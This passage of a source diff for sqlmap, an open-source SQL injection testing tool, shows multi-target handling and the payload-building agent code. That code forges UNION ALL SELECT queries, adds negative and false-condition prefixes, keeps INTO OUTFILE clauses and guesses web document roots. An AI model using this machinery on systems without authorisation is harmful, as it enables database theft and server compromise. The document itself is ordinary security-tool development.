-        kb.targetUrls.add(conf.url)
+        kb.targetUrls.add(( conf.url, conf.method, conf.data, conf.cookie ))

    if conf.configFile and not kb.targetUrls:
        errMsg  = "you did not edit the configuration file properly, set "
-        errMsg += "the target url properly"
+        errMsg += "the target url, list of targets or google dork"
        logger.error(errMsg)

+    if kb.targetUrls and len(kb.targetUrls) > 1:
+        infoMsg = "sqlmap got a total of %d targets" % len(kb.targetUrls)
+        logger.info(infoMsg)
+
    hostCount               = 0
-    injData                 = []
-    receivedCookies         = []
    cookieStr               = ""
    setCookieAsInjectable   = True

-    for targetUrl in kb.targetUrls:
-        if conf.googleDork:
-            hostCount += 1
+    for targetUrl, targetMethod, targetData, targetCookie in kb.targetUrls:
+        conf.url    = targetUrl
+        conf.method = targetMethod
+        conf.data   = targetData
+        conf.cookie = targetCookie
+        injData     = []

-            message  = "url %d: %s, " % (hostCount, targetUrl)
-            message += "do you want to test this url? [Y/n/q] "
+        if conf.multipleTargets:
+            hostCount += 1
+            message = "url %d:\n%s %s" % (hostCount, conf.method or "GET", targetUrl)
+
+            if conf.cookie:
+                message += "\nCookie: %s" % conf.cookie
+
+            if conf.data:
+                message += "\nPOST data: %s" % conf.data
+
+            message += "\ndo you want to test this url? [Y/n/q]"
            test = readInput(message, default="Y")

-            if test[0] in ("n", "N"):
+            if not test:
+                pass
+            elif test[0] in ("n", "N"):
                continue
            elif test[0] in ("q", "Q"):
                break
@@ -121,12 +134,14 @@ def start():
            logMsg = "testing url %s" % targetUrl
            logger.info(logMsg)

-        conf.url = targetUrl
+        parseTargetUrl()
+        createTargetDirs()
        initTargetEnv()

-        if not checkConnection() or not checkString():
+        if not checkConnection() or not checkString() or not checkRegexp():
            continue

+        if not conf.dropSetCookie:
            for _, cookie in enumerate(conf.cj):
                cookie = str(cookie)
                index  = cookie.index(" for ")
@@ -149,7 +164,7 @@ def start():
    
                if setCookieAsInjectable:
                    conf.httpHeaders.append(("Cookie", cookieStr))
-                conf.parameters["Cookie"] = cookieStr.replace("%", "%%")
+                    conf.parameters["Cookie"] = cookieStr
                    __paramDict = paramToDict("Cookie", cookieStr)
    
                    if __paramDict:
@@ -157,22 +172,10 @@ def start():
                        __testableParameters = True

        if not kb.injPlace or not kb.injParameter or not kb.injType:
-            if not conf.string:
-                if checkStability():
-                    logMsg = "url is stable"
-                    logger.info(logMsg)
-                else:
-                    errMsg  = "url is not stable, try with --string option, refer "
-                    errMsg += "to the user's manual paragraph 'String match' "
-                    errMsg += "for details"
-
-                    if conf.googleDork:
-                        errMsg += ", skipping to next url"
-                        logger.warn(errMsg)
-
-                        continue
-                    else:
-                        raise sqlmapConnectionException, errMsg
+            if not conf.string and not conf.regexp and not conf.eRegexp:
+                # NOTE: this is not needed anymore, leaving only to display
+                # a warning message to the user in case the page is not stable
+                checkStability()

            for place in conf.parameters.keys():
                if not conf.paramDict.has_key(place):
@@ -181,13 +184,23 @@ def start():
                paramDict = conf.paramDict[place]

                for parameter, value in paramDict.items():
-                    if not checkDynParam(place, parameter, value):
+                    testSqlInj = True
+
+                    # Avoid dinamicity test if the user provided the
+                    # parameter manually
+                    if parameter in conf.testParameter:
+                        pass
+
+                    elif not checkDynParam(place, parameter, value):
                        warnMsg = "%s parameter '%s' is not dynamic" % (place, parameter)
                        logger.warn(warnMsg)
+                        testSqlInj = False
+
                    else:
                        logMsg = "%s parameter '%s' is dynamic" % (place, parameter)
                        logger.info(logMsg)

+                    if testSqlInj:
                        for parenthesis in range(0, 4):
                            logMsg  = "testing sql injection on %s " % place
                            logMsg += "parameter '%s' with " % parameter
@@ -201,41 +214,48 @@ def start():

                                break
                            else:
+                                infoMsg  = "%s parameter '%s' is not " % (place, parameter)
+                                infoMsg += "injectable with %d parenthesis" % parenthesis
+                                logger.info(infoMsg)
+
+                        if not injData:
                            warnMsg  = "%s parameter '%s' is not " % (place, parameter)
-                                warnMsg += "injectable with %d parenthesis" % parenthesis
+                            warnMsg += "injectable"
                            logger.warn(warnMsg)

        if not kb.injPlace or not kb.injParameter or not kb.injType:
            if len(injData) == 1:
                injDataSelected = injData[0]
+
            elif len(injData) > 1:
                injDataSelected = __selectInjection(injData)
+
+            elif conf.multipleTargets:
+                continue
+
            else:
                return

            if injDataSelected == "Quit":
                return
+
            else:
                kb.injPlace, kb.injParameter, kb.injType = injDataSelected
                setInjection()

-        if not conf.googleDork and ( not kb.injPlace or not kb.injParameter or not kb.injType ):
+        if not conf.multipleTargets and ( not kb.injPlace or not kb.injParameter or not kb.injType ):
            raise sqlmapNotVulnerableException, "all parameters are not injectable"
        elif kb.injPlace and kb.injParameter and kb.injType:
-            condition = False
-
-            if conf.googleDork:
+            if conf.multipleTargets:
                message = "do you want to exploit this SQL injection? [Y/n] "
                exploit = readInput(message, default="Y")

-                if not exploit or exploit[0] in ("y", "Y"):
-                    condition = True
+                condition = not exploit or exploit[0] in ("y", "Y")
            else:
                condition = True

            if condition:
                checkForParenthesis()
-                createTargetDirs()
                action()

    if conf.loggedToOut:
--- a/lib/controller/handler.py
+++ b/lib/controller/handler.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
@@ -37,7 +35,6 @@ from plugins.dbms.mysql import MySQLMap
 from plugins.dbms.oracle import OracleMap
 from plugins.dbms.postgresql import PostgreSQLMap

-
 def setHandler():
    """
    Detect which is the target web application back-end database
@@ -55,9 +52,11 @@ def setHandler():

    for dbmsAliases, dbmsEntry in dbmsMap:
        if conf.dbms and conf.dbms not in dbmsAliases:
-            debugMsg  = "skipping to test for %s" % dbmsNames[count]
+            debugMsg  = "skipping test for %s" % dbmsNames[count]
            logger.debug(debugMsg)
+
            count += 1
+
            continue

        dbmsHandler = dbmsEntry()
--- a/lib/core/init.py
+++ b/lib/core/init.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,18 +22,16 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
 import re

 from lib.core.common import randomInt
 from lib.core.common import randomStr
+from lib.core.convert import urlencode
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import queries
 from lib.core.data import temp
 from lib.core.exception import sqlmapNoneDataException
-from lib.core.exception import sqlmapUnsupportedDBMSException


 class Agent:
@@ -46,25 +44,33 @@ class Agent:
        temp.start     = randomStr(6)
        temp.stop      = randomStr(6)

-
-    def payload(self, place=None, parameter=None, value=None, newValue=None):
+    def payload(self, place=None, parameter=None, value=None, newValue=None, negative=False, falseCond=False):
        """
        This method replaces the affected parameter with the SQL
        injection statement to request
        """

+        falseValue = ""
+        negValue   = ""
        retValue   = ""
+        newValue   = urlencode(newValue)
+
+        if negative or conf.paramNegative:
+            negValue = "-"
+        elif falseCond or conf.paramFalseCond:
+            randInt = randomInt()
+            falseValue = " AND %d=%d" % (randInt, randInt + 1)

        # After identifing the injectable parameter
        if kb.injPlace == "User-Agent":
            retValue = kb.injParameter.replace(kb.injParameter,
-                                               kb.injParameter + newValue)
+                                               "%s%s" % (negValue, kb.injParameter + falseValue + newValue))
        elif kb.injParameter:
            paramString = conf.parameters[kb.injPlace]
            paramDict = conf.paramDict[kb.injPlace]
            value = paramDict[kb.injParameter]
            retValue = paramString.replace("%s=%s" % (kb.injParameter, value),
-                                           "%s=%s" % (kb.injParameter, value + newValue))
+                                           "%s=%s%s" % (kb.injParameter, negValue, value + falseValue + newValue))

        # Before identifing the injectable parameter
        elif parameter == "User-Agent":
@@ -76,6 +82,12 @@ class Agent:

        return retValue

+    def fullPayload(self, query):
+        query   = self.prefixQuery(query)
+        query   = self.postfixQuery(query)
+        payload = self.payload(newValue=query)
+
+        return payload

    def prefixQuery(self, string):
        """
@@ -86,7 +98,10 @@ class Agent:

        query = ""

-        if kb.injType == "numeric":
+        if conf.prefix:
+            query = conf.prefix
+        else:
+            if kb.injType == "numeric" or conf.postfix:
                pass
            elif kb.injType in ( "stringsingle", "likesingle" ):
                query = "'"
@@ -95,14 +110,13 @@ class Agent:
            else:
                raise sqlmapNoneDataException, "unsupported injection type"

-        if kb.parenthesis != None:
+            if kb.parenthesis not in ( None, 0 ):
                query += "%s " % (")" * kb.parenthesis)

        query += string

        return query

-
    def postfixQuery(self, string, comment=None):
        """
        This method appends the DBMS comment to the
@@ -113,9 +127,12 @@ class Agent:
        randStr = randomStr()

        if comment:
-            string += "%s" % comment
+            string += comment

-        if kb.parenthesis != None:
+        if conf.postfix:
+            string += " %s" % conf.postfix
+        else:
+            if kb.parenthesis is not None:
                string += " AND %s" % ("(" * kb.parenthesis)
            else:
                raise sqlmapNoneDataException, "unable to get the number of parenthesis"
@@ -135,7 +152,6 @@ class Agent:

        return string

-
    def nullAndCastField(self, field):
        """
        Take in input a field string and return its processed nulled and
@@ -166,12 +182,14 @@ class Agent:
        @rtype: C{str}
        """

+        if field.startswith("(CASE"):
+            nulledCastedField = field
+        else:
            nulledCastedField = queries[kb.dbms].cast % field
            nulledCastedField = queries[kb.dbms].isnull % nulledCastedField

        return nulledCastedField

-
    def nullCastConcatFields(self, fields):
        """
        Take in input a sequence of fields string and return its processed
@@ -218,29 +236,63 @@ class Agent:

        return nulledCastedConcatFields

-
    def getFields(self, query):
+        """
+        Take in input a query string and return its fields (columns) and
+        more details.
+
+        Example:
+
+        Input:  SELECT user, password FROM mysql.user
+        Output: user,password
+
+        @param query: query to be processed
+        @type query: C{str}
+
+        @return: query fields (columns) and more details
+        @rtype: C{str}
+        """
+
        fieldsSelectTop      = re.search("\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", query, re.I)
        fieldsSelectDistinct = re.search("\ASELECT\s+DISTINCT\((.+?)\)\s+FROM", query, re.I)
+        fieldsSelectCase     = re.search("\ASELECT\s+(\(CASE WHEN\s+.+\s+END\))", query, re.I)
        fieldsSelectFrom     = re.search("\ASELECT\s+(.+?)\s+FROM\s+", query, re.I)
        fieldsSelect         = re.search("\ASELECT\s+(.*)", query, re.I)
        fieldsNoSelect       = query

        if fieldsSelectTop:
-            fieldsToCast = fieldsSelectTop.groups()[0]
+            fieldsToCastStr = fieldsSelectTop.groups()[0]
        elif fieldsSelectDistinct:
-            fieldsToCast = fieldsSelectDistinct.groups()[0]
+            fieldsToCastStr = fieldsSelectDistinct.groups()[0]
+        elif fieldsSelectCase:
+            fieldsToCastStr = fieldsSelectCase.groups()[0]
        elif fieldsSelectFrom:
-            fieldsToCast = fieldsSelectFrom.groups()[0]
+            fieldsToCastStr = fieldsSelectFrom.groups()[0]
        elif fieldsSelect:
-            fieldsToCast = fieldsSelect.groups()[0]
+            fieldsToCastStr = fieldsSelect.groups()[0]
        elif fieldsNoSelect:
-            fieldsToCast = fieldsNoSelect
+            fieldsToCastStr = fieldsNoSelect

-        return fieldsSelectFrom, fieldsSelect, fieldsNoSelect, fieldsToCast
+        fieldsToCastList = fieldsToCastStr.replace(", ", ",")
+        fieldsToCastList = fieldsToCastList.split(",")

+        return fieldsSelectFrom, fieldsSelect, fieldsNoSelect, fieldsSelectTop, fieldsSelectCase, fieldsToCastList, fieldsToCastStr

-    def concatQuery(self, query):
+    def simpleConcatQuery(self, query1, query2):
+        concatenatedQuery = ""
+
+        if kb.dbms == "MySQL":
+            concatenatedQuery = "CONCAT(%s,%s)" % (query1, query2)
+
+        elif kb.dbms in ( "PostgreSQL", "Oracle" ):
+            concatenatedQuery = "%s||%s" % (query1, query2)
+
+        elif kb.dbms == "Microsoft SQL Server":
+            concatenatedQuery = "%s+%s" % (query1, query2)
+
+        return concatenatedQuery
+
+    def concatQuery(self, query, unpack=True):
        """
        Take in input a query string and return its processed nulled,
        casted and concatenated query string.
@@ -266,53 +318,66 @@ class Agent:
        @rtype: C{str}
        """

-        concatQuery = ""
+        if unpack:
+            concatenatedQuery = ""
            query             = query.replace(", ", ",")

-        fieldsSelectFrom, fieldsSelect, fieldsNoSelect, fieldsToCast = self.getFields(query)
-        castedFields = self.nullCastConcatFields(fieldsToCast)
-        concatQuery = query.replace(fieldsToCast, castedFields, 1)
+            fieldsSelectFrom, fieldsSelect, fieldsNoSelect, fieldsSelectTop, fieldsSelectCase, _, fieldsToCastStr = self.getFields(query)
+            castedFields      = self.nullCastConcatFields(fieldsToCastStr)
+            concatenatedQuery = query.replace(fieldsToCastStr, castedFields, 1)
+        else:
+            concatenatedQuery = query
+            fieldsSelectFrom, fieldsSelect, fieldsNoSelect, fieldsSelectTop, fieldsSelectCase, _, fieldsToCastStr = self.getFields(query)

        if kb.dbms == "MySQL":
-            if fieldsSelectFrom:
-                concatQuery = concatQuery.replace("SELECT ", "CONCAT('%s'," % temp.start, 1)
-                concatQuery = concatQuery.replace(" FROM ", ",'%s') FROM " % temp.stop, 1)
+            if fieldsSelectCase:
+                concatenatedQuery  = concatenatedQuery.replace("SELECT ", "CONCAT('%s'," % temp.start, 1)
+                concatenatedQuery += ",'%s')" % temp.stop
+            elif fieldsSelectFrom:
+                concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT('%s'," % temp.start, 1)
+                concatenatedQuery = concatenatedQuery.replace(" FROM ", ",'%s') FROM " % temp.stop, 1)
            elif fieldsSelect:
-                concatQuery  = concatQuery.replace("SELECT ", "CONCAT('%s'," % temp.start, 1)
-                concatQuery += ",'%s')" % temp.stop
+                concatenatedQuery  = concatenatedQuery.replace("SELECT ", "CONCAT('%s'," % temp.start, 1)
+                concatenatedQuery += ",'%s')" % temp.stop
            elif fieldsNoSelect:
-                concatQuery = "CONCAT('%s',%s,'%s')" % (temp.start, concatQuery, temp.stop)
+                concatenatedQuery = "CONCAT('%s',%s,'%s')" % (temp.start, concatenatedQuery, temp.stop)

-        elif kb.dbms in ( "Oracle", "PostgreSQL" ):
-            if fieldsSelectFrom:
-                concatQuery = concatQuery.replace("SELECT ", "'%s'||" % temp.start, 1)
-                concatQuery = concatQuery.replace(" FROM ", "||'%s' FROM " % temp.stop, 1)
+        elif kb.dbms in ( "PostgreSQL", "Oracle" ):
+            if fieldsSelectCase:
+                concatenatedQuery  = concatenatedQuery.replace("SELECT ", "'%s'||" % temp.start, 1)
+                concatenatedQuery += "||'%s'" % temp.stop
+            elif fieldsSelectFrom:
+                concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % temp.start, 1)
+                concatenatedQuery = concatenatedQuery.replace(" FROM ", "||'%s' FROM " % temp.stop, 1)
            elif fieldsSelect:
-                concatQuery  = concatQuery.replace("SELECT ", "'%s'||" % temp.start, 1)
-                concatQuery += "||'%s'" % temp.stop
-
-                if kb.dbms == "Oracle":
-                    concatQuery += " FROM DUAL"
+                concatenatedQuery  = concatenatedQuery.replace("SELECT ", "'%s'||" % temp.start, 1)
+                concatenatedQuery += "||'%s'" % temp.stop
            elif fieldsNoSelect:
-                concatQuery = "'%s'||%s||'%s'" % (temp.start, concatQuery, temp.stop)
+                concatenatedQuery = "'%s'||%s||'%s'" % (temp.start, concatenatedQuery, temp.stop)

-                if kb.dbms == "Oracle":
-                    concatQuery += " FROM DUAL"
+            if kb.dbms == "Oracle" and " FROM " not in concatenatedQuery and ( fieldsSelect or fieldsNoSelect ):
+                concatenatedQuery += " FROM DUAL"

        elif kb.dbms == "Microsoft SQL Server":
-            if fieldsSelectFrom:
-                concatQuery = concatQuery.replace("SELECT ", "'%s'+" % temp.start, 1)
-                concatQuery = concatQuery.replace(" FROM ", "+'%s' FROM " % temp.stop, 1)
+            if fieldsSelectTop:
+                topNum = re.search("\ASELECT\s+TOP\s+([\d]+)\s+", concatenatedQuery, re.I).group(1)
+                concatenatedQuery = concatenatedQuery.replace("SELECT TOP %s " % topNum, "TOP %s '%s'+" % (topNum, temp.start), 1)
+                concatenatedQuery = concatenatedQuery.replace(" FROM ", "+'%s' FROM " % temp.stop, 1)
+            elif fieldsSelectCase:
+                concatenatedQuery  = concatenatedQuery.replace("SELECT ", "'%s'+" % temp.start, 1)
+                concatenatedQuery += "+'%s'" % temp.stop
+            elif fieldsSelectFrom:
+                concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'+" % temp.start, 1)
+                concatenatedQuery = concatenatedQuery.replace(" FROM ", "+'%s' FROM " % temp.stop, 1)
            elif fieldsSelect:
-                concatQuery  = concatQuery.replace("SELECT ", "'%s'+" % temp.start, 1)
-                concatQuery += "+'%s'" % temp.stop
+                concatenatedQuery  = concatenatedQuery.replace("SELECT ", "'%s'+" % temp.start, 1)
+                concatenatedQuery += "+'%s'" % temp.stop
            elif fieldsNoSelect:
-                concatQuery = "'%s'+%s+'%s'" % (temp.start, concatQuery, temp.stop)
+                concatenatedQuery = "'%s'+%s+'%s'" % (temp.start, concatenatedQuery, temp.stop)

-        return concatQuery
+        return concatenatedQuery

-
-    def forgeInbandQuery(self, query, exprPosition=None):
+    def forgeInbandQuery(self, query, exprPosition=None, nullChar="NULL"):
        """
        Take in input an query (pseudo query) string and return its
        processed UNION ALL SELECT query.
@@ -345,9 +410,20 @@ class Agent:

        inbandQuery = self.prefixQuery(" UNION ALL SELECT ")

+        if query.startswith("TOP"):
+            topNum       = re.search("\ATOP\s+([\d]+)\s+", query, re.I).group(1)
+            query        = query[len("TOP %s " % topNum):]
+            inbandQuery += "TOP %s " % topNum
+
        if not exprPosition:
            exprPosition = kb.unionPosition

+        intoRegExp = re.search("(\s+INTO (DUMP|OUT)FILE\s+\'(.+?)\')", query, re.I)
+
+        if intoRegExp:
+            intoRegExp = intoRegExp.group(1)
+            query = query[:query.index(intoRegExp)]
+
        if kb.dbms == "Oracle" and inbandQuery.endswith(" FROM DUAL"):
            inbandQuery = inbandQuery[:-len(" FROM DUAL")]

@@ -356,30 +432,129 @@ class Agent:
                inbandQuery += ", "

            if element == exprPosition:
-                if " FROM " in query:
-                    conditionIndex = query.rindex(" FROM ")
-                    inbandQuery += "%s" % query[:conditionIndex]
+                if " FROM " in query and not query.startswith("SELECT ") and "(CASE WHEN (" not in query:
+                    conditionIndex = query.index(" FROM ")
+                    inbandQuery += query[:conditionIndex]
                else:
-                    inbandQuery += "%s" % query
+                    inbandQuery += query
            else:
-                inbandQuery += "NULL"
+                inbandQuery += nullChar

-        if " FROM " in query:
-            conditionIndex = query.rindex(" FROM ")
-            inbandQuery += "%s" % query[conditionIndex:]
+        if " FROM " in query and not query.startswith("SELECT ") and "(CASE WHEN (" not in query:
+            conditionIndex = query.index(" FROM ")
+            inbandQuery += query[conditionIndex:]

        if kb.dbms == "Oracle":
            if " FROM " not in inbandQuery:
                inbandQuery += " FROM DUAL"

-            if " ORDER BY " in inbandQuery:
-                orderIndex  = inbandQuery.index(" ORDER BY ")
-                inbandQuery = inbandQuery[:orderIndex]
+        if intoRegExp:
+            inbandQuery += intoRegExp

        inbandQuery = self.postfixQuery(inbandQuery, kb.unionComment)

        return inbandQuery

+    def limitQuery(self, num, query, field=None):
+        """
+        Take in input a query string and return its limited query string.
+
+        Example:
+
+        Input:  SELECT user FROM mysql.users
+        Output: SELECT user FROM mysql.users LIMIT <num>, 1
+
+        @param num: limit number
+        @type num: C{int}
+
+        @param query: query to be processed
+        @type query: C{str}
+
+        @param field: field within the query
+        @type field: C{list}
+
+        @return: limited query string
+        @rtype: C{str}
+        """
+
+        limitedQuery  = query
+        limitStr      = queries[kb.dbms].limit
+        fromIndex     = limitedQuery.index(" FROM ")
+        untilFrom     = limitedQuery[:fromIndex]
+        fromFrom      = limitedQuery[fromIndex+1:]
+
+        if kb.dbms in ( "MySQL", "PostgreSQL" ):
+            limitStr = queries[kb.dbms].limit % (num, 1)
+            limitedQuery += " %s" % limitStr
+
+        elif kb.dbms == "Oracle":
+            if " ORDER BY " in limitedQuery and "(SELECT " in limitedQuery:
+                limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]
+
+            if query.startswith("SELECT "):
+                limitedQuery = "%s FROM (%s, %s" % (untilFrom, untilFrom, limitStr)
+            else:
+                limitedQuery = "%s FROM (SELECT %s, %s" % (untilFrom, ", ".join(f for f in field), limitStr)
+            limitedQuery  = limitedQuery % fromFrom
+            limitedQuery += "=%d" % (num + 1)
+
+        elif kb.dbms == "Microsoft SQL Server":
+            forgeNotIn = True
+
+            if " ORDER BY " in limitedQuery:
+                limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]
+
+            notDistincts = re.findall("DISTINCT[\(\s+](.+?)\)*\s+", limitedQuery, re.I)
+
+            for notDistinct in notDistincts:
+                limitedQuery = limitedQuery.replace("DISTINCT(%s)" % notDistinct, notDistinct)
+                limitedQuery = limitedQuery.replace("DISTINCT %s" % notDistinct, notDistinct)
+
+            if limitedQuery.startswith("SELECT TOP ") or limitedQuery.startswith("TOP "):
+                topNums         = re.search(queries[kb.dbms].limitregexp, limitedQuery, re.I)
+
+                if topNums:
+                    topNums = topNums.groups()
+                    quantityTopNums = topNums[0]
+                    limitedQuery    = limitedQuery.replace("TOP %s" % quantityTopNums, "TOP 1", 1)
+                    startTopNums    = topNums[1]
+                    limitedQuery    = limitedQuery.replace(" (SELECT TOP %s" % startTopNums, " (SELECT TOP %d" % num)
+                    forgeNotIn      = False
+                else:
+                    topNum          = re.search("TOP\s+([\d]+)\s+", limitedQuery, re.I).group(1)
+                    limitedQuery    = limitedQuery.replace("TOP %s " % topNum, "")
+
+            if forgeNotIn:
+                limitedQuery = limitedQuery.replace("SELECT ", (limitStr % 1), 1)
+
+                if " WHERE " in limitedQuery:
+                    limitedQuery  = "%s AND %s " % (limitedQuery, field)
+                else:
+                    limitedQuery  = "%s WHERE %s " % (limitedQuery, field)
+
+                limitedQuery += "NOT IN (%s" % (limitStr % num)
+                limitedQuery += "%s %s)" % (field, fromFrom)
+
+        return limitedQuery
+
+    def forgeCaseStatement(self, expression):
+        """
+        Take in input a query string and return its CASE statement query
+        string.
+
+        Example:
+
+        Input:  (SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) LIMIT 0, 1)='Y'
+        Output: SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) LIMIT 0, 1)='Y') THEN 1 ELSE 0 END)
+
+        @param expression: expression to be processed
+        @type num: C{str}
+
+        @return: processed expression
+        @rtype: C{str}
+        """
+
+        return queries[kb.dbms].case % expression

 # SQL agent
 agent = Agent()
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,27 +22,38 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
 import os
 import random
 import re
+import socket
 import string
 import sys
 import time
 import urlparse
+import ntpath
+import posixpath

+from tempfile import NamedTemporaryFile
+from tempfile import mkstemp

-from lib.core.convert import urldecode
+from extra.cloak.cloak import decloak
+from lib.contrib import magic
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
-from lib.core.data import temp
-from lib.core.exception import sqlmapFilePathException
 from lib.core.data import paths
+from lib.core.data import queries
+from lib.core.data import temp
+from lib.core.convert import urlencode
+from lib.core.exception import sqlmapFilePathException
+from lib.core.exception import sqlmapNoneDataException
+from lib.core.exception import sqlmapSyntaxException
+from lib.core.settings import DESCRIPTION
+from lib.core.settings import IS_WIN
+from lib.core.settings import SITE
+from lib.core.settings import SQL_STATEMENTS
 from lib.core.settings import VERSION_STRING

-
 def paramToDict(place, parameters=None):
    """
    Split the parameters into names and values, check if these parameters
@@ -75,14 +86,13 @@ def paramToDict(place, parameters=None):
        elem = element.split("=")

        if len(elem) == 2:
-            parameter = elem[0]
+            parameter = elem[0].replace(" ", "")

            condition  = not conf.testParameter
            condition |= parameter in conf.testParameter

            if condition:
                value = elem[1]
-                if value:
                testableParameters[parameter] = value

    if conf.testParameter and not testableParameters:
@@ -97,7 +107,7 @@ def paramToDict(place, parameters=None):
            warnMsg  = "the testable parameter '%s' " % paramStr
            warnMsg += "you provided is not into the %s" % place

-        if conf.googleDork:
+        if conf.multipleTargets:
            warnMsg += ", skipping to next url"

        logger.warn(warnMsg)
@@ -111,8 +121,7 @@ def paramToDict(place, parameters=None):

    return testableParameters

-
-def formatFingerprint(versions=None):
+def formatDBMSfp(versions=None):
    """
    This function format the back-end DBMS fingerprint value and return its
    values formatted as a human readable string.
@@ -121,14 +130,76 @@ def formatFingerprint(versions=None):
    @rtype: C{str}
    """

-    if not versions:
+    if not versions or versions == [None]:
        versions = kb.dbmsVersion

    if isinstance(versions, str):
        return "%s %s" % (kb.dbms, versions)
    elif isinstance(versions, (list, set, tuple)):
        return "%s %s" % (kb.dbms, " and ".join([version for version in versions]))
+    elif not versions:
+        warnMsg  = "unable to extensively fingerprint the back-end "
+        warnMsg += "DBMS version"
+        logger.warn(warnMsg)

+        return kb.dbms
+
+def formatFingerprintString(values, chain=" or "):
+    strJoin = "|".join([v for v in values])
+
+    return strJoin.replace("|", chain)
+
+def formatFingerprint(target, info):
+    """
+    This function format the back-end operating system fingerprint value
+    and return its values formatted as a human readable string.
+
+    Example of info (kb.headersFp) dictionary:
+
+    {
+      'distrib': set(['Ubuntu']),
+      'type': set(['Linux']),
+      'technology': set(['PHP 5.2.6', 'Apache 2.2.9']),
+      'release': set(['8.10'])
+    }
+
+    Example of info (kb.bannerFp) dictionary:
+
+    {
+      'sp': set(['Service Pack 4']),
+      'dbmsVersion': '8.00.194',
+      'dbmsServicePack': '0',
+      'distrib': set(['2000']),
+      'dbmsRelease': '2000',
+      'type': set(['Windows'])
+    }
+
+    @return: detected back-end operating system based upon fingerprint
+    techniques.
+    @rtype: C{str}
+    """
+
+    infoStr = ""
+
+    if info and "type" in info:
+        infoStr += "%s operating system: %s" % (target, formatFingerprintString(info["type"]))
+
+        if "distrib" in info:
+            infoStr += " %s" % formatFingerprintString(info["distrib"])
+
+        if "release" in info:
+            infoStr += " %s" % formatFingerprintString(info["release"])
+
+        if "sp" in info:
+            infoStr += " %s" % formatFingerprintString(info["sp"])
+
+        if "codename" in info:
+            infoStr += " (%s)" % formatFingerprintString(info["codename"])
+
+    if "technology" in info:
+        infoStr += "\nweb application technology: %s" % formatFingerprintString(info["technology"], ", ")
+
+    return infoStr

 def getHtmlErrorFp():
    """
@@ -153,82 +224,115 @@ def getHtmlErrorFp():

    return htmlParsed

-
-def getDocRoot():
-    """
-    This method returns the web application document root based on the
-    detected absolute files paths in the knowledge base.
-    """
-
+def getDocRoot(webApi=None):
    docRoot = None
+    pagePath = directoryPath(conf.path)
+
+    if kb.os == "Windows":
+        if webApi == "php":
+            defaultDocRoot = "C:/xampp/htdocs/"
+        else:
+            defaultDocRoot = "C:/Inetpub/wwwroot/"
+    else:
+        defaultDocRoot = "/var/www/"

    if kb.absFilePaths:
-        logMsg  = "retrieved the possible injectable "
-        logMsg += "file absolute system paths: "
-        logMsg += "'%s'" % ", ".join(path for path in kb.absFilePaths)
-        logger.info(logMsg)
-    else:
-        warnMsg  = "unable to retrieve the injectable file "
-        warnMsg += "absolute system path"
-        logger.warn(warnMsg)
-
        for absFilePath in kb.absFilePaths:
-        if conf.path in absFilePath:
-            index = absFilePath.index(conf.path)
+            if directoryPath(absFilePath) == '/':
+                continue
+            absFilePath = normalizePath(absFilePath)
+            absFilePathWin = None
+
+            if isWindowsPath(absFilePath):
+                absFilePathWin = posixToNtSlashes(absFilePath)
+                absFilePath    = ntToPosixSlashes(absFilePath[2:])
+            
+            if pagePath in absFilePath:
+                index   = absFilePath.index(pagePath)
                docRoot = absFilePath[:index]
+
+                if len(docRoot) == 0:
+                    docRoot = None
+                    continue
+
+                if absFilePathWin:
